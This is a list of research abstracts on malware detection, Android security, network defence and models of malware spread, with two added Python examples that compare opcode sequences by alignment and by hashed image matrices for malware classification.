    COMPREHENSION-DRIVEN PROGRAM ANALYSIS (CPA) FOR MALWARE DETECTION IN ANDROID PHONES IOWA STATE UNIVERSITY JULY 2015 FINAL...DRIVEN PROGRAM ANALYSIS (CPA) FOR MALWARE DETECTION IN ANDROID PHONES 5b. GRANT NUMBER N/A 5c. PROGRAM ELEMENT NUMBER 6 1101E 6. AUTHOR(S) 5d...machine analysis system to detect novel, sophisticated Android malware. (c) An innovative library summarization technique and its incorporation in

  3. CyberTerrorism: Cyber Prevention vs Cyber Recovery

    DTIC Science & Technology

    2007-12-01

    appropriate available security measures (i.e. an appropriate level of spyware, IDS, and antivirus protection software installed) are unaffected by worm attacks...a worm is a form of virus designed to copy itself by utilizing e-mail or other software applications. The main goal of using this technique is...to permeate the network or portions of the Internet with malicious code that will affect the performance of certain software applications or will

  4. Modeling Security Aspects of Network

    NASA Astrophysics Data System (ADS)

    Schoch, Elmar

    With more and more widespread usage of computer systems and networks, dependability becomes a paramount requirement. Dependability typically denotes tolerance of or protection against all kinds of failures, errors and faults. Sources of failures can basically be accidental, e.g., in the case of hardware errors or software bugs, or intentional due to some kind of malicious behavior. These intentional, malicious actions are the subject of security. A more complete overview of the relations between dependability and security can be found in [31]. In parallel to the increased use of technology, misuse has also grown significantly, requiring measures to deal with it.

  5. Survey of Malware Threats and Recommendations to Improve Cybersecurity for Industrial Control Systems Version 1.0

    DTIC Science & Technology

    2015-02-01

    not normally blocked by enterprise firewalls. • Some malware exploited zero-day vulnerabilities as well as attempted to exploit vulnerabilities for...servers, receiving updates, and exfiltrating data. Firewalls are routinely configured to block incoming connections while malware within a target...implemented with layers of technical security controls (e.g., ICS-aware firewalls) to control network traffic and prevent the spread of malware. Intrusion

  6. Malware analysis using visualized image matrices.

    PubMed

    Han, KyoungSoo; Kang, BooJoong; Im, Eul Gyu

    2014-01-01

    This paper proposes a novel malware visual analysis method that contains not only a visualization method to convert binary files into images, but also a similarity calculation method between these images. The proposed method generates RGB-colored pixels on image matrices using the opcode sequences extracted from malware samples and calculates the similarities between the image matrices. In particular, our proposed methods are applicable to packed malware samples by applying them to the execution traces extracted through dynamic analysis. When the images are generated, we can reduce the overheads by extracting the opcode sequences only from the blocks that include the instructions related to staple behaviors such as functions and application programming interface (API) calls. In addition, we propose a technique that generates a representative image for each malware family in order to reduce the number of comparisons for the classification of unknown samples, and the colored pixel information in the image matrices is used to calculate the similarities between the images. Our experimental results show that the image matrices of malware can effectively be used to classify malware families both statically and dynamically, with accuracies of 0.9896 and 0.9732, respectively.

  7. Measuring Cyber Operations Effectiveness

    DTIC Science & Technology

    2014-11-01

    are advanced firewalls capable of taking limited action to block malicious traffic or hacking attempts. Their capabilities vary widely and must be...using many automated tools, included in the defense hardware and software itself. These devices include hardware and software firewalls, Network...DoD networks are probed millions of times per day…the Air Force blocks roughly two billion threats and denies two million emails each week

  8. Detection and Prevention of Android Malware Attempting to Root the Device

    DTIC Science & Technology

    2014-03-01

    detect the operation of malware trying to root the phone. This research aims to detect the Exploid, RageAgainstTheCage, and Gingerbreak exploits on...attackers can use malware to root the system. By placing sensors inside the critical paths, the research detected all 379 malware samples trying the root...zero false positive results. Unlike static signature detection at the application level, this research provides dynamic detection at the kernel level

  9. Sweetening Android Lemon Markets: Measuring and Curbing Malware in Application Marketplaces

    DTIC Science & Technology

    2012-06-08

    the main software distribution mechanism for modern mobile devices but are also emerging as a viable alternative to brick-and-mortar stores for...mechanism for modern mobile devices but are also emerging as a viable alternative to brick-and-mortar stores for personal computers. While most...through the Apple App Store, thereby entirely forgoing the traditional distribution channel – packaged optical media sold in brick-and-mortar

  10. Protecting Dynamic Mobile Agent against Denial of Service Attacks

    NASA Astrophysics Data System (ADS)

    Aggarwal, Mayank; Nipur, Pallavi

    2010-11-01

    Mobile agents are software that migrates from one node to another to fulfill the task of its owner. The introduction of mobile agents has greatly reduced network latency and network traffic, but at the same time it has increased the vulnerability to attacks by malicious hosts. One such attack is `Denial of Service': once the agent is launched it is free to roam without any control by its owner, which on the one hand decreases the cost of agent-owner interaction and on the other hand increases the chances of `Denial of Service'. In a Denial of Service attack the malicious host may deny resources required by the agent and kill the agent, so that the result computed so far is lost, and this may happen every time the agent visits a malicious host. In this paper we continue the work done in [10], in which the authors proposed techniques by which the owner can detect a malicious host responsible for `Denial of Service', but did not cover a technique for dynamic routes, i.e. where the host or agent initiates migrations to hosts not contained in the route composed by the owner. We introduce an algorithm and a model that can be useful for the above purpose.

  11. Entropyology: the application of bioinformatics and data modeling to digital virus and malware recognition

    NASA Astrophysics Data System (ADS)

    Jaenisch, Holger M.; Handley, James W.

    2010-04-01

    Malware are analogs of viruses. Viruses are comprised of large numbers of polypeptide proteins. The shape and function of the protein strands determine the functionality of the segment, similar to a subroutine in malware. The full combination of subroutines is the malware organism, in analogous fashion to a collection of polypeptides forming information-bearing protein structures. We propose to apply the methods of bioinformatics to analyze malware, providing a rich feature set for a unique and novel detection and classification scheme originally developed for amino acid sequencing in bioinformatics. Our proposed methods enable real-time in situ (in contrast to in vivo) detection applications.
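    The bioinformatics tool the analogy leads to most directly is sequence alignment. The following is an added example, not the authors' scheme: it tokenises constructed disassembly listings into opcode "sequences", optionally collapses them to a reduced alphabet of instruction classes (the analogue of grouping amino acids by chemical property; the class table is an assumption), and scores local similarity with Smith-Waterman. A metamorphic variant that inserts a junk instruction and swaps a conditional jump still aligns closely; an unrelated routine does not.

```python
"""Smith-Waterman local alignment over opcode sequences.
Added illustration; the listings and the class table are constructed."""
import re

OPCODE_RE = re.compile(r"^\s*(?:[0-9A-Fa-f]{4,}\s+)?([a-z]+)")

# Reduced alphabet: instruction classes, like amino-acid property groups (assumption).
OPCODE_CLASS = {
    "push": "S", "pop": "S",                                        # stack
    "mov": "M", "lea": "M", "xchg": "M",                            # data movement
    "add": "A", "sub": "A", "xor": "A", "and": "A", "or": "A",
    "inc": "A", "dec": "A", "shl":"A", "shr": "A",                  # arithmetic / logic
    "cmp": "T", "test": "T",                                        # compare
    "jz": "J", "jnz": "J", "je": "J", "jne": "J", "jb": "J", "jmp": "J",  # control flow
    "call": "C", "ret": "C", "leave": "C",                          # calls / returns
    "nop": "N",
}

def opcodes(listing):
    """Mnemonics from a disassembly listing; addresses and operands dropped."""
    out = []
    for line in listing.splitlines():
        m = OPCODE_RE.match(line)
        if m:
            out.append(m.group(1))
    return out

def reduce_alphabet(seq):
    """Map each mnemonic to its class; unknown mnemonics become '?'."""
    return [OPCODE_CLASS.get(op, "?") for op in seq]

def smith_waterman(a, b, match=2, mismatch=-1, gap=-1):
    """Best local alignment score (linear gap penalty); 0 if nothing is shared."""
    h = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    best = 0
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            s = match if a[i - 1] == b[j - 1] else mismatch
            h[i][j] = max(0, h[i - 1][j - 1] + s, h[i - 1][j] + gap, h[i][j - 1] + gap)
            best = max(best, h[i][j])
    return best

def similarity(a, b, match=2):
    """Score normalised by the best score the shorter sequence could reach."""
    if not a or not b:
        return 0.0
    return smith_waterman(a, b, match=match) / (match * min(len(a), len(b)))

# Constructed listings: B is A with a junk nop inserted and jz rewritten as jnz;
# C is an unrelated loop body.
LISTING_A = """
00401000  push ebp
00401001  mov ebp, esp
00401003  sub esp, 10h
00401006  call sub_401100
0040100B  test eax, eax
0040100D  jz short loc_401016
0040100F  mov ecx, eax
00401011  call sub_401200
00401016  leave
00401017  ret
"""
LISTING_B = """
00402000  push ebp
00402001  mov ebp, esp
00402003  nop
00402004  sub esp, 10h
00402007  call sub_402100
0040200C  test eax, eax
0040200E  jnz short loc_402017
00402010  mov ecx, eax
00402012  call sub_402200
00402017  leave
00402018  ret
"""
LISTING_C = """
00403000  xor eax, eax
00403002  lea edx, [ebx+4]
00403005  cmp edx, ecx
00403007  jb short loc_403012
00403009  inc eax
0040300A  shl eax, 1
0040300C  add eax, edx
0040300E  or eax, 8
00403011  dec ecx
00403012  jmp short loc_403000
"""
```

    On the raw mnemonics A and B score 16 of a possible 20 (nine matches, one gap, one jz/jnz mismatch); on the reduced alphabet the jump swap becomes a match and the score rises to 19, while A and C reach only 5 by chance alignment of a compare-and-branch. The quadratic DP is fine for function-sized sequences; whole-binary comparisons need the banded or seed-and-extend variants the same field developed for genomes.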

  12. Monitoring Malware Activity on the LAN Network

    NASA Astrophysics Data System (ADS)

    Skrzewski, Mirosław

    Many security related organizations periodically publish current network and systems security information, including lists of the top malware programs. These lists raise the question of how these threats spread, if worms (the only threat with their own communication abilities) are low or missing on these lists. The paper discusses research on malware network activity, aimed at answering the question of what the main infection channel of modern malware is, carried out using virtual honeypot systems on a dedicated, unprotected network. The system setup, the network and system monitoring solutions, and the results of over three months of network traffic and malware monitoring are presented, along with the proposed answer to our research question.

  13. Software Authority Transition through Multiple Distributors

    PubMed Central

    Han, Kyusunk; Shon, Taeshik

    2014-01-01

    The rapid growth in the use of smartphones and tablets has changed the software distribution ecosystem. The trend today is to purchase software through application stores rather than from traditional offline markets. Smartphone and tablet users can install applications easily by purchasing from the online store deployed on their device. Several systems, such as Android or PC-based OS units, allow users to install software from multiple sources. Such openness, however, can promote serious threats, including malware and illegal usage. In order to prevent such threats, several stores use online authentication techniques. These methods can, however, also present a problem whereby even licensed users cannot use their purchased application. In this paper, we discuss these issues and provide an authentication method that will make purchased applications available to the registered user at all times. PMID:25143971

  14. Software authority transition through multiple distributors.

    PubMed

    Han, Kyusunk; Shon, Taeshik

    2014-01-01

    The rapid growth in the use of smartphones and tablets has changed the software distribution ecosystem. The trend today is to purchase software through application stores rather than from traditional offline markets. Smartphone and tablet users can install applications easily by purchasing from the online store deployed on their device. Several systems, such as Android or PC-based OS units, allow users to install software from multiple sources. Such openness, however, can promote serious threats, including malware and illegal usage. In order to prevent such threats, several stores use online authentication techniques. These methods can, however, also present a problem whereby even licensed users cannot use their purchased application. In this paper, we discuss these issues and provide an authentication method that will make purchased applications available to the registered user at all times.

  15. Malware Analysis Using Visualized Image Matrices

    PubMed Central

    Im, Eul Gyu

    2014-01-01

    This paper proposes a novel malware visual analysis method that contains not only a visualization method to convert binary files into images, but also a similarity calculation method between these images. The proposed method generates RGB-colored pixels on image matrices using the opcode sequences extracted from malware samples and calculates the similarities between the image matrices. In particular, our proposed methods are applicable to packed malware samples by applying them to the execution traces extracted through dynamic analysis. When the images are generated, we can reduce the overheads by extracting the opcode sequences only from the blocks that include the instructions related to staple behaviors such as functions and application programming interface (API) calls. In addition, we propose a technique that generates a representative image for each malware family in order to reduce the number of comparisons for the classification of unknown samples, and the colored pixel information in the image matrices is used to calculate the similarities between the images. Our experimental results show that the image matrices of malware can effectively be used to classify malware families both statically and dynamically, with accuracies of 0.9896 and 0.9732, respectively. PMID:25133202
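    Records 6 and 15 above are the same paper; this added example illustrates the pipeline they describe and is not the authors' code. The abstract does not say how an opcode sequence becomes pixels, so the mapping here is an assumption: each opcode bigram is hashed with SHA-256, the first two digest bytes pick the pixel position on a 64x64 matrix and the next three give its RGB colour, so identical bigrams in different samples land on identical pixels. Similarity is the Jaccard index of coloured pixels, a family representative keeps the pixels shared by a quorum of members, and the matrix can be written out as a PPM image for viewing. The opcode sequences are constructed.

```python
"""Opcode sequences -> RGB image matrices -> pixel similarity.
Added illustration; the bigram-to-pixel hashing and the sequences are constructed."""
import hashlib

GRID = 64  # image matrix is GRID x GRID

def opcode_image(opcodes, grid=GRID):
    """Map each opcode bigram to one coloured pixel. Position and RGB both
    come from SHA-256 of the pair, so equal bigrams yield equal pixels in
    every image. Two bigrams hashing to the same cell are merged channel-wise."""
    image = {}
    for a, b in zip(opcodes, opcodes[1:]):
        d = hashlib.sha256(f"{a}|{b}".encode()).digest()
        pos = (d[0] % grid, d[1] % grid)
        color = (d[2], d[3], d[4])
        prev = image.get(pos)
        image[pos] = color if prev is None else tuple(max(p, c) for p, c in zip(prev, color))
    return image

def similarity(img1, img2):
    """Jaccard index over (position, colour) pixels; 1.0 means identical matrices."""
    p1, p2 = set(img1.items()), set(img2.items())
    union = p1 | p2
    return len(p1 & p2) / len(union) if union else 1.0

def family_representative(images, quorum=0.5):
    """Pixels present in at least `quorum` of the family's images; an unknown
    sample is compared against this one matrix instead of every member."""
    counts = {}
    for img in images:
        for pixel in img.items():
            counts[pixel] = counts.get(pixel, 0) + 1
    need = quorum * len(images)
    return {pos: color for (pos, color), n in counts.items() if n >= need}

def to_ppm(image, grid=GRID):
    """Binary PPM (P6) bytes; unused cells stay black."""
    header = f"P6 {grid} {grid} 255\n".encode()
    body = bytearray(grid * grid * 3)
    for (x, y), (r, g, b) in image.items():
        i = 3 * (y * grid + x)
        body[i:i + 3] = bytes((r, g, b))
    return header + bytes(body)

# Constructed opcode sequences: B is a variant of A (junk nop, jz -> jnz); C is unrelated.
OPS_A = ["push", "mov", "sub", "call", "test", "jz", "mov", "call", "leave", "ret"]
OPS_B = ["push", "mov", "nop", "sub", "call", "test", "jnz", "mov", "call", "leave", "ret"]
OPS_C = ["xor", "lea", "cmp", "jb", "inc", "shl", "add", "or", "dec", "jmp"]

if __name__ == "__main__":
    a, b, c = opcode_image(OPS_A), opcode_image(OPS_B), opcode_image(OPS_C)
    print("A~B", round(similarity(a, b), 3), "A~C", round(similarity(a, c), 3))
    with open("sample_a.ppm", "wb") as f:
        f.write(to_ppm(a))
```

    A and B share six of their thirteen distinct bigrams, so their matrices score roughly 0.46 while A and C share nothing and score 0. Hashing makes the layout arbitrary, which is fine for similarity but loses the locality a human wants when eyeballing images; the paper's colour scheme is designed for that, and for packed samples the opcodes should come from an execution trace rather than the static disassembly, as the abstract notes.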

  16. Go Ahead of Malware’s Infections and Controls: Towards New Techniques for Proactive Cyber Defense

    DTIC Science & Technology

    2016-12-08

    in SDN (such as topology poisoning attacks and data-to-control plane saturation attacks) and developed new defenses for SDN (such as TopoGuard and... Poisoning Network Visibility in Software-Defined Networks: New Attacks and Countermeasures As part of our research on discovering new vulnerabilities...future networking paradigm. We demonstrate that these new attacks can effectively poison the network topology information, then further successfully

  17. Covert Android Rootkit Detection: Evaluating Linux Kernel Level Rootkits on the Android Operating System

    DTIC Science & Technology

    2012-06-14

    the attacker. Thus, this race condition causes a privilege escalation. 2.2.5 Summary This section reviewed software exploitation of a Linux kernel...has led to increased targeting by malware writers. Android attacks have naturally sparked interest in researching protections for Android. This...release, Android 4.0 Ice Cream Sandwich. These rootkits focused on covert techniques to hide the presence of data used by an attacker to infect a

  18. Dynamic malware analysis using IntroVirt: a modified hypervisor-based system

    NASA Astrophysics Data System (ADS)

    White, Joshua S.; Pape, Stephen R.; Meily, Adam T.; Gloo, Richard M.

    2013-05-01

    In this paper, we present a system for dynamic malware analysis which incorporates the use of IntroVirt™. IntroVirt is an introspective hypervisor architecture and infrastructure that supports advanced analysis techniques for stealth-malware analysis. This system allows for complete guest monitoring and interaction, including the manipulation and blocking of system calls. IntroVirt is capable of bypassing the virtual machine detection capabilities of even the most sophisticated malware by spoofing the responses returned to system calls. Additional fuzzing capabilities can be employed to detect both malware vulnerabilities and polymorphism.

  19. An Android malware detection system based on machine learning

    NASA Astrophysics Data System (ADS)

    Wen, Long; Yu, Haiyang

    2017-08-01

    The Android smartphone, with its open source character and excellent performance, has attracted many users. However, the convenience of the Android platform has also motivated the development of malware. The traditional method, which detects malware based on signatures, is unable to detect unknown applications. The article proposes a machine learning-based lightweight system that is capable of identifying malware on Android devices. In this system we extract features based on static analysis and dynamic analysis; then a new feature selection approach based on principal component analysis (PCA) and Relief is presented in the article to decrease the dimensionality of the features. After that, a model is constructed with a support vector machine (SVM) for classification. Experimental results show that our system provides an effective method for Android malware detection.

  20. Securing mobile code.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Link, Hamilton E.; Schroeppel, Richard Crabtree; Neumann, William Douglas

    2004-10-01

    If software is designed so that the software can issue functions that will move that software from one computing platform to another, then the software is said to be 'mobile'. There are two general areas of security problems associated with mobile code. The 'secure host' problem involves protecting the host from malicious mobile code. The 'secure mobile code' problem, on the other hand, involves protecting the code from malicious hosts. This report focuses on the latter problem. We have found three distinct camps of opinions regarding how to secure mobile code. There are those who believe special distributed hardware is necessary, those who believe special distributed software is necessary, and those who believe neither is necessary. We examine all three camps, with a focus on the third. In the distributed software camp we examine some commonly proposed techniques including Java, D'Agents and Flask. For the specialized hardware camp, we propose a cryptographic technique for 'tamper-proofing' code over a large portion of the software/hardware life cycle by careful modification of current architectures. This method culminates by decrypting/authenticating each instruction within a physically protected CPU, thereby protecting against subversion by malicious code. Our main focus is on the camp that believes that neither specialized software nor hardware is necessary. We concentrate on methods of code obfuscation to render an entire program or a data segment on which a program depends incomprehensible. The hope is to prevent or at least slow down reverse engineering efforts and to prevent goal-oriented attacks on the software and execution. The field of obfuscation is still in a state of development with the central problem being the lack of a basis for evaluating the protection schemes. We give a brief introduction to some of the main ideas in the field, followed by an in depth analysis of a technique called 'white-boxing'. We put forth some new attacks and improvements on this method as well as demonstrating its implementation for various algorithms. We also examine cryptographic techniques to achieve obfuscation including encrypted functions and offer a new application to digital signature algorithms. To better understand the lack of security proofs for obfuscation techniques, we examine in detail general theoretical models of obfuscation. We explain the need for formal models in order to obtain provable security and the progress made in this direction thus far. Finally we tackle the problem of verifying remote execution. We introduce some methods of verifying remote exponentiation computations and some insight into generic computation checking.

  1. Malware Memory Analysis of the IVYL Linux Rootkit: Investigating a Publicly Available Linux Rootkit Using the Volatility Memory Analysis Framework

    DTIC Science & Technology

    2015-04-01

    report is to examine how a computer forensic investigator/incident handler, without specialised computer memory or software reverse engineering skills ...The skills amassed by incident handlers and investigators alike while using Volatility to examine Windows memory images will be of some help...bin/pulseaudio --start --log-target=syslog 1362 1000 1000 nautilus 1366 1000 1000 /usr/lib/pulseaudio/pulse/gconf-helper 1370 1000 1000 nm-applet

  2. Cloud Security: Issues and Research Directions

    DTIC Science & Technology

    2014-11-18

    4. Cloud Computing Security: What Changes with Software-Defined Networking? Maurício Tsugawa, Andréa Matsunaga, and José A. B. Fortes 5...machine’s memory from an untrusted or malicious hypervisor. In Chapter 4, Tsugawa et al. discuss the security issues introduced when Software-Defined Networking (SDN) is deployed within and across clouds. Chapters 5-9 are focused on the protection of data stored in the cloud. In Chapter 5, Wang et

  3. A Discrete Mathematical Model to Simulate Malware Spreading

    NASA Astrophysics Data System (ADS)

    Del Rey, A. Martin; Sánchez, G. Rodriguez

    2012-10-01

    With the advent and worldwide development of the Internet, the study and control of malware spreading has become very important. In this sense, some mathematical models to simulate malware propagation have been proposed in the scientific literature, and usually they are based on differential equations exploiting the similarities with mathematical epidemiology. The great majority of these models study the behavior of a particular type of malware called computer worms; indeed, to the best of our knowledge, no model has been proposed to simulate the spreading of a computer virus (the traditional type of malware, which differs from computer worms in several aspects). In this sense, the purpose of this work is to introduce a new mathematical model based not on continuous mathematical tools but on discrete ones, to analyze and study the epidemic behavior of computer viruses. Specifically, cellular automata are used to design such a model.

  4. Intrusion-Tolerant Replication under Attack

    ERIC Educational Resources Information Center

    Kirsch, Jonathan

    2010-01-01

    Much of our critical infrastructure is controlled by large software systems whose participants are distributed across the Internet. As our dependence on these critical systems continues to grow, it becomes increasingly important that they meet strict availability and performance requirements, even in the face of malicious attacks, including those…

  5. Information hiding techniques for infrared images: exploring the state-of-the art and challenges

    NASA Astrophysics Data System (ADS)

    Pomponiu, Victor; Cavagnino, Davide; Botta, Marco; Nejati, Hossein

    2015-10-01

    The proliferation of infrared technology and imaging systems enables a different perspective to tackle many computer vision problems in defense and security applications. Infrared images are widely used by law enforcement, Homeland Security and military organizations to achieve a significant advantage or situational awareness, and thus it is vital to protect these data against malicious attacks. Concurrently, sophisticated malware is being developed which is able to disrupt the security and integrity of these digital media. For instance, illegal distribution and manipulation are possible malicious attacks on the digital objects. In this paper we explore the use of a new layer of defense for the integrity of infrared images through the aid of information hiding techniques such as watermarking. In this context, we analyze the efficiency of several optimal decoding schemes for the watermark inserted into the Singular Value Decomposition (SVD) domain of the IR images using an additive spread spectrum (SS) embedding framework. In order to use the singular values (SVs) of the IR images with the SS embedding we adopt several restrictions that ensure that the values of the SVs will maintain their statistics. For both the optimal maximum likelihood decoder and the sub-optimal decoders we assume that the PDF of the SVs can be modeled by the Weibull distribution. Furthermore, we investigate the challenges involved in protecting and assuring the integrity of IR images, such as data complexity and the error probability behavior, i.e., the probability of detection and the probability of false detection, for the applied optimal decoders. By taking into account the efficiency and the auxiliary information necessary for decoding the watermark, we discuss the suitable decoder for various operating situations. Experiments are carried out on a large dataset of IR images to show the imperceptibility and efficiency of the proposed scheme against various attack scenarios.

  6. Graphs for information security control in software defined networks

    NASA Astrophysics Data System (ADS)

    Grusho, Alexander A.; Abaev, Pavel O.; Shorgin, Sergey Ya.; Timonina, Elena E.

    2017-07-01

    Information security control in software defined networks (SDN) is connected with the execution of the security policy rules regulating information access and protection against the distribution of malicious code and harmful influences. The paper offers a representation of a security policy in the form of a hierarchical structure which, when resources are allocated to tasks, defines graphs of admissible interactions in a network. These graphs define the commutation tables of the switches via the SDN controller.

  7. Dynamic malware containment under an epidemic model with alert

    NASA Astrophysics Data System (ADS)

    Zhang, Tianrui; Yang, Lu-Xing; Yang, Xiaofan; Wu, Yingbo; Tang, Yuan Yan

    2017-03-01

    Alerting at the early stage of malware invasion turns out to be an important complement to malware detection and elimination. This paper addresses the issue of how to dynamically contain the prevalence of malware at a lower cost, provided alerting is feasible. A controlled epidemic model with alert is established, and an optimal control problem based on the epidemic model is formulated. The optimality system for the optimal control problem is derived. The structure of an optimal control for the proposed optimal control problem is characterized under some conditions. Numerical examples show that the cost-efficiency of an optimal control strategy can be enhanced by adjusting the upper and lower bounds on admissible controls.

  8. Android malware detection based on evolutionary super-network

    NASA Astrophysics Data System (ADS)

    Yan, Haisheng; Peng, Lingling

    2018-04-01

    In this paper, an Android malware detection method based on an evolutionary super-network is proposed in order to improve the precision of Android malware detection. The chi-square statistic is used for selecting characteristics on the basis of analyzing Android permissions. Boolean weighting is utilized for calculating characteristic weights. The processed characteristic vectors are used as the training set and test set; a hyperedge replacement strategy is used for training the super-network classification model, which then classifies the test set characteristic vectors, and it is compared with traditional classification algorithms. The results show that the detection method proposed in the paper is close to or better than traditional classification algorithms. The proposed method is thus an effective means of Android malware detection.

  9. Modeling malware propagation using a carrier compartment

    NASA Astrophysics Data System (ADS)

    Hernández Guillén, J. D.; Martín del Rey, A.

    2018-03-01

    The great majority of mathematical models proposed to simulate malware spreading are based on systems of ordinary differential equations. These are compartmental models where the devices are classified according to some types: susceptible, exposed, infectious, recovered, etc. As far as we know, there is no model considering the special class of carrier devices. This type consists of the devices whose operating systems are not targeted by the malware (for example, iOS devices for Android malware). In this work a novel mathematical model incorporating this new compartment is proposed. Its qualitative study is presented and a detailed analysis of the efficient control measures is shown by studying the basic reproductive number.

  10. Risk Metrics for Android (trademark) Devices

    DTIC Science & Technology

    2017-02-01

    allows for easy distribution of malware. This report surveys malware distribution methodologies, then describes current work being done to determine the...given a standard weight of wi = 1. Two data sets were used for testing this methodology. Because the authors are Chinese, they chose to download apps...Order Analysis excels at handling non-obfuscated apps, but may not be able to detect malware that employs encryption or dynamically changes its payload

  11. Detection Of Malware Collusion With Static Dependence Analysis On Inter-App Communication

    DTIC Science & Technology

    2016-12-08

    DETECTION OF MALWARE COLLUSION WITH STATIC DEPENDENCE ANALYSIS ON INTER-APP COMMUNICATION VIRGINIA TECH DECEMBER 2016 FINAL TECHNICAL REPORT... DEPENDENCE ANALYSIS ON INTER-APP COMMUNICATION 5a. CONTRACT NUMBER FA8750-15-2-0076 5b. GRANT NUMBER N/A 5c. PROGRAM ELEMENT NUMBER 61101E 6. AUTHOR(S...exploited. 15. SUBJECT TERMS Malware Collusion; Inter-App Communication; Static Dependence Analysis 16. SECURITY CLASSIFICATION OF: 17. LIMITATION OF

  12. An epidemiological model of internet worms with hierarchical dispersal and spatial clustering of hosts.

    PubMed

    Hiebeler, David E; Audibert, Andrew; Strubell, Emma; Michaud, Isaac J

    2017-04-07

    Beginning in 2001, many instances of malicious software known as Internet worms have been using biological strategies such as hierarchical dispersal to seek out and spread to new susceptible hosts more efficiently. We measured the distribution of potentially susceptible hosts in the space of Internet addresses to determine their clustering. We have used the results to construct a full-size simulated Internet with 2^32 hosts with the mean and variance of susceptible hosts chosen to match our measurements at multiple spatial scales. Epidemiological simulations of outbreaks among the roughly 2.8×10^6 susceptible hosts on this full-sized network show that local preference scanning greatly increases the chances for an infected host to locate and infect other susceptible hosts, by a factor of as much as several hundred. However, once this strategy is deployed, the overall success of a worm is relatively insensitive to the details of its dispersal strategy over a wide range of parameters. In addition, although using localized interactions may allow malicious software to spread more rapidly or to more hosts on average, it can also lead to increased variability in infection levels among replicate simulations. Using such dispersal strategies may therefore be a high risk, high reward strategy for the authors of such software. Copyright © 2017 Elsevier Ltd. All rights reserved.

  13. Hybrid methods for cybersecurity analysis :

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Davis, Warren Leon,; Dunlavy, Daniel M.

    2014-01-01

    Early 2010 saw a significant change in adversarial techniques aimed at network intrusion: a shift from malware delivered via email attachments toward the use of hidden, embedded hyperlinks to initiate sequences of downloads and interactions with web sites and network servers containing malicious software. Enterprise security groups were well poised and experienced in defending against the former attacks, but the new types of attacks were larger in number, more challenging to detect, dynamic in nature, and required the development of new technologies and analytic capabilities. The Hybrid LDRD project was aimed at delivering new capabilities in large-scale data modeling and analysis to enterprise security operators and analysts and at understanding the challenges of detection and prevention of emerging cybersecurity threats. Leveraging previous LDRD research efforts and capabilities in large-scale relational data analysis, large-scale discrete data analysis and visualization, and streaming data analysis, new modeling and analysis capabilities were quickly brought to bear on the problems of email phishing and spear phishing attacks in the Sandia enterprise security operational groups at the onset of the Hybrid project. As part of this project, a software development and deployment framework was created within the security analysts' workflow tool sets to facilitate the delivery and testing of new capabilities as they became available, and machine learning algorithms were developed to address the challenge of dynamic threats. Furthermore, researchers from the Hybrid project were embedded in the security analyst groups for almost a full year, engaged in daily operational activities and routines, creating an atmosphere of trust and collaboration between the researchers and security personnel. The Hybrid project has altered the way that research ideas can be incorporated into the production environments of Sandia's enterprise security groups, reducing time to deployment from months and years to hours and days for the application of new modeling and analysis capabilities to emerging threats. The development and deployment framework has been generalized into the Hybrid Framework and incorporated into several LDRD, WFO, and DOE/CSL projects and proposals. Most importantly, the Hybrid project has provided Sandia security analysts with new, scalable, extensible analytic capabilities that have resulted in alerts not detectable using their previous workflow tool sets.

  14. 3 CFR 8427 - Proclamation 8427 of October 1, 2009. National Cybersecurity Awareness Month, 2009

    Code of Federal Regulations, 2010 CFR

    2010-01-01

    ... solutions at work and at home. Our Nation's growing dependence on cyber and information-related technologies, coupled with an increasing threat of malicious cyber attacks and loss of privacy, has given rise to the... digital infrastructures. Cyber attacks and their viral ability to infect networks, devices, and software...

  15. Cyber Ricochet: Risk Management and Cyberspace Operations

    DTIC Science & Technology

    2012-07-01

    Cox, U.S. Cyber Command Director of Intelligence Introduction Recent media reports of the 'Duqu', 'Flame', and 'Stuxnet' malware highlight...as the 'Duqu,' 'Flame,' and 'Stuxnet' malware, are just a few of the capabilities that can contribute to mission success and achieve strategic...rely on artificially intelligent agents to dredge up the deepest secrets." 19 The 'Duqu' and 'Flame' malware are excellent examples of computer

  16. Modeling and analyzing malware propagation in social networks with heterogeneous infection rates

    NASA Astrophysics Data System (ADS)

    Jia, Peng; Liu, Jiayong; Fang, Yong; Liu, Liang; Liu, Luping

    2018-10-01

    With the rapid development of social networks, attackers have begun trying to spread malware more widely by utilizing various kinds of social networks. Thus, studying malware epidemic dynamics in these networks is becoming a popular subject in the literature. Most of the previous works focus on the effects of factors such as network topology and user behavior on malware propagation. Some researchers try to analyze the heterogeneity of infection rates, but the common problem of their works is that the factors they consider as affecting the heterogeneity are not comprehensive enough. In this paper, focusing on the effects of heterogeneous infection rates, we propose a novel model called HSID (heterogeneous-susceptible-infectious-dormant model) to characterize virus propagation in social networks, in which a connection factor is presented to evaluate the heterogeneous relationships between nodes, and a resistance factor is introduced to represent a node's changing ability to resist infection. We analyzed how key parameters in the two factors affect the heterogeneity and then performed simulations to explore the effects in three real-world social networks. The results indicate that heterogeneous relationships could lead to wider diffusion in a directed network, and heterogeneous security awareness could lead to wider diffusion in both directed and undirected networks; heterogeneous relationships could restrain the outbreak of malware, but heterogeneous initial security awareness would increase its probability; furthermore, resistance that increases with the number of times a node has been infected would lead to the malware's disappearance from social networks.

  17. An analysis of security system for intrusion in Smartphone environment.

    PubMed

    Louk, Maya; Lim, Hyotaek; Lee, HoonJae

    2014-01-01

    There are many malware applications on smartphones. Smartphone users may be unaware that their data has been recorded and stolen by intruders via malware. Smartphones, whether for business or personal use, may not be protected from malware. Thus, monitoring, detecting, tracking, and notification (MDTN) have become the main purpose of this paper. MDTN is meant to enable smartphones to prevent and reduce the number of cybercrimes. The methods are shown to be effective in protecting the smartphone, isolating malware and sending a warning in the form of a notification to the user about the danger in progress. In particular, (a) the MDTN process is possible and will be enabled for the smartphone environment, and (b) the methods are shown to provide advanced security for the private sensitive data of the smartphone user.

  18. An Analysis of Security System for Intrusion in Smartphone Environment

    PubMed Central

    Louk, Maya; Lim, Hyotaek; Lee, HoonJae

    2014-01-01

